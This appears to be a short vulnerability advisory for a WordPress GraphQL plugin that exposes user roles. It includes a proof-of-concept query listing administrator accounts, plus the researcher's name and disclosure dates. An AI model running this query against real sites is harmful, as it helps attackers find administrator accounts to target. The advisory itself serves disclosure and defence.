The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }
Rohan Pagey
Rohan Pagey
Yes
2019-07-10 (about 2 years ago)
2022-05-02 (about 2 months ago)
2022-05-03 (about 2 months ago)